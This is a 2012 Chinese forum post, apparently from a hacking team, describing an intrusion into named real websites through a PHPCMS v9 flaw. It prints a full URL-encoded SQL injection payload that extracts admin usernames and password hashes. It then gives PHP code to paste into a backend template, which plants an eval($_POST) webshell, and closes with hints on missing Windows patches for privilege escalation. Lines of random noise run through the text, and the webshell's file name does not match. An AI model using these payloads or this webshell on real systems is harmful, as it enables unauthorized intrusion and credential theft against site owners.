利用phpcms v9 0day拿shell

admin · 发表于 2012-12-20 08:44:41

期末快到了，各种作业啊。。学计算机的伤不起啊。。话说我们有门课很有意思，叫做黑客攻防，期末作业就是黑站，我笑了。。前几天在服务器上嗅探把服务器搞死了，管理员漏洞也补了，写这篇文章单凭记忆，图片较少，还请见谅。

Author：夜行人

From：F4ck Team

目标站：http://www.ipucom.com/

旁注到一个站点：www.zhongyitong.com有phpcmsv9注射漏洞

百度一下找到该漏洞的利用方法。

直接在该网站注册用户名，然后在该网站域名后加上这段代码就能爆出数据库名

api.php?op=add_favorite&url=xx.oo&title=%2527
4 X3 l( ^( Z3 c  c( P2 u" H                                           0 J& d; T9 o5 G% _6 ]/ M
' ~1 y' B- C" f2 t$ f4 H1 ^

3 g5 g6 n; @' o% `+ c# h# x* t! Q2 G1 W. ?& p& U% Z5 s3 L$ ]: x

. v% j1 _0 r0 f6 c2 X( R3 E# Y. z- s  c7 a. U$ M

% L0 w- @/ ?& S+ `
5 {2 M0 N) I3 a, C
3 C- _, G) h0 h* Y: E8 {                                                       ) I% W: o) W' Q, N7 A9 F
                                                      : Q+ B. o8 H2 e( h1 M# e; _) X

这里可以清楚的看到数据库名和表名，然后把该表名替换一下代码中的表名

api.php?op=add_favorite&url=xx.oo&title=%2527%2520and%2520%2528select%25201%2520from%

2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select

%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252C

password%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from

%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables

%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from

%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and

%2520%25271%2527%253D%25271

" ]2 c/ _ }. W" H5 ~; N: f8 d2 Y) N# b

8 }3 R+ c0 j# F" f0 X- Q# R
# M2 a( Z1 d* U: n7 P

帐号密码就出来了，md5解密一下就行了

进入后台, 界面 > 模板管理 > 模板风格 >$ j3 W4 p! \8 o

" y9 w: A! @# J" b* L* k7 Z5 O& n! }( M

  R7 \* B( N7 c$ j  |. i0 p% r. c/ w- W$ w

* g* o" e, \1 n/ N
% N# Y/ ^# [, E3 ~8 }! c9 _& `% n) H* \; [  O) M

: p: p7 T& Q) t' P1 t& M8 n

点击后面的修改，然后把一下代码复制上去保存

<?

$fp = @fopen("c.php", 'a');

@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[zmzsg100])'."\r\n\r\n?".">\r\n");

@fclose($fp);

?>; f( T" z/ M1 Z6 K6 i4 R& h. q$ f& t

9 ?  \+ D3 E# M: \0 n4 b9 {' B/ J2 R3 y+ s

7 X0 q7 u9 [9 i; O1 y7 A5 D8 g
: T5 z3 |! M2 X1 j8 }8 E0 g                                                                      $ \& T- b- Q3 d% @: a

5 O8 b; p6 D. S4 q* Y' \4 d3 b6 X  T4 W1 S5 c# A

4 w+ G1 O3 n$ g% N( Z2 Q
& x/ e3 p. V: [1 ?$ D7 n
2 g& J( O  c( S9 r* g: _

提交后可视化一下
N U" r2 ~- l3 m4 Q! c2 f1 M; ^9 h9 l6 y7 u. C* Y$ n% p1 E

在网站的根目录就生成了你的一句话木马客户端

http://www.zhongyitong.com/f4ck.php

然后通过控制端连上去就行了。。。

提权貌似很简单，看了下systeminfo

发现没有

KB2503665

KB2592799

		自动登录	找回密码
密码			立即注册

利用phpcms v9 0day拿shell

本帖子中包含更多资源

浏览过的版块